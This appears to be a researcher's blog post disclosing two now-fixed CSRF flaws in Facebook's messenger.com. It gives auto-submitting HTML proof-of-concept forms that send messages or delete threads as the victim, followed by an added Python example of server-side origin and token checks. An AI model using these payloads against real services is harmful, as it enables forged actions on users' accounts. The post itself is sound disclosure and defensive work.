Facebook Messenger Multiple CSRF Vulnerabilities


In this post, I will be demonstrating the findings of multiple interesting cross-site request forgery vulnerabilities that I identified on Facebook. These vulnerabilities allow an attacker to force the victim to perform various actions.

In April 2015, Facebook officially launched messenger.com, a stand-alone Facebook Messenger for the web. After hearing about the launch, I started testing it in my spare time.


Sending Unrestricted Messages to Any User via CSRF

Using this issue, I was able to force any user to send messages to other users without the user’s knowledge.

PoC:

<html>
<title>POC @mazen160</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/send_messages.php">
<input type="hidden" id="message_batch[0][author]" name="message_batch[0][author]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][is_filtered_content]" name="message_batch[0][is_filtered_content]" value="false">
<input type="hidden" id="message_batch[0][is_spoof_warning]" name="message_batch[0][is_spoof_warning]" value="false">
<input type="hidden" id="message_batch[0][source]" name="message_batch[0][source]" value="">
<input type="hidden" id="message_batch[0][body]" name="message_batch[0][body]" value="@mazen160">
<input type="hidden" id="message_batch[0][specific_to_list][0]" name="message_batch[0][specific_to_list][0]" value="fbid:VALUE2">
<input type="hidden" id="message_batch[0][specific_to_list][1]" name="message_batch[0][specific_to_list][1]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][client_thread_id]" name="message_batch[0][client_thread_id]" value="fbid:VALUE2">
</form>
</body>
</html>

Where:

Deleting Any messages via CSRF

Using this issue, I was able to force any user to delete messaging threads.

PoC:

<html>
<title>POC @mazen160</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/delete_thread.php">
<input type="hidden" id="ids[0]" name="ids[0]" value="VALUE">
<input type="hidden" id="__user" name="__user" value="">
<input type="hidden" id="__a" name="__a" value="1">
<input type="hidden" id="__dyn" name="__dyn" value="">
<input type="hidden" id="__req" name="__req" value="p">
<input type="hidden" id="fb_dtsg" name="fb_dtsg" value="">
<input type="hidden" id="ttstamp" name="ttstamp" value="">
<input type="hidden" id="__rev" name="__rev" value="">
</form>
</body>
</html>

Change the value of the ids[0] parameter to the victim’s thread ID.
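Both PoCs work for the same reason: the endpoints accepted a cross-site POST without tying it to a secret the attacker cannot know (the first form carries no token at all, the second sends an empty fb_dtsg). The following is an added example of the server-side check that closes that gap, written for this post and not Facebook's code; the allowed origin, the form field name and the request shapes are assumptions.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlparse

# Assumption: the application's own origin (constructed for this example).
ALLOWED_ORIGINS = {"https://www.messenger.com"}


def new_csrf_token() -> str:
    """Per-session secret the server stores and embeds in its own forms."""
    return secrets.token_urlsafe(32)


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Origin header if the browser sent one, else the Referer's origin."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        p = urlparse(referer)
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}"
    return None


def is_csrf_safe(method: str, headers: Dict[str, str],
                 form: Dict[str, str], session_token: str) -> bool:
    """Allow a state-changing request only if it is same-origin AND carries
    the session's anti-CSRF token (here in the fb_dtsg field, as the post's
    second PoC names it). A missing or empty token is rejected outright."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True  # safe methods must not change state in the first place
    origin = request_origin(headers)
    if origin is None or origin not in ALLOWED_ORIGINS:
        return False  # an auto-submitted form on another site shows its origin
    submitted = form.get("fb_dtsg", "")
    if not submitted:
        return False  # no token, or the empty value the delete PoC sends
    return hmac.compare_digest(submitted, session_token)


def demo() -> Dict[str, bool]:
    """Constructed requests: a cross-site PoC-style post and a legitimate one."""
    token = new_csrf_token()
    attack = is_csrf_safe("POST", {"Origin": "https://attacker.example"},
                          {"ids[0]": "12345", "fb_dtsg": ""}, token)
    legit = is_csrf_safe("POST", {"Origin": "https://www.messenger.com"},
                         {"ids[0]": "12345", "fb_dtsg": token}, token)
    return {"csrf_attempt": attack, "legitimate": legit}
```

The origin check alone is not enough (some clients strip Referer and older browsers omit Origin), and the token alone is not enough if it is ever leaked or accepted when empty, so the two are checked together.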

The issues were fixed very quickly. I would like to thank the Facebook security team for their outstanding work in responding to security submissions.

If you need any help securing your web application or service, you can contact me by e-mail or Twitter.

Mazin Ahmed
